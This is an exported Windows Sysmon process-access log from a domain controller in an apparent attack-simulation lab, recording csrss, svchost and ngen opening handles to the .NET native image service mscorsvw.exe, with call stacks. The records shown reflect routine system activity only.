13:46:21.968{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.906{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.890{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.843{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.796{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.796{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DF01-00000000A301}4752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.734{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.718{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.718{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DE01-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.671{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DD01-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.640{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.640{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DC01-00000000A301}3224C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 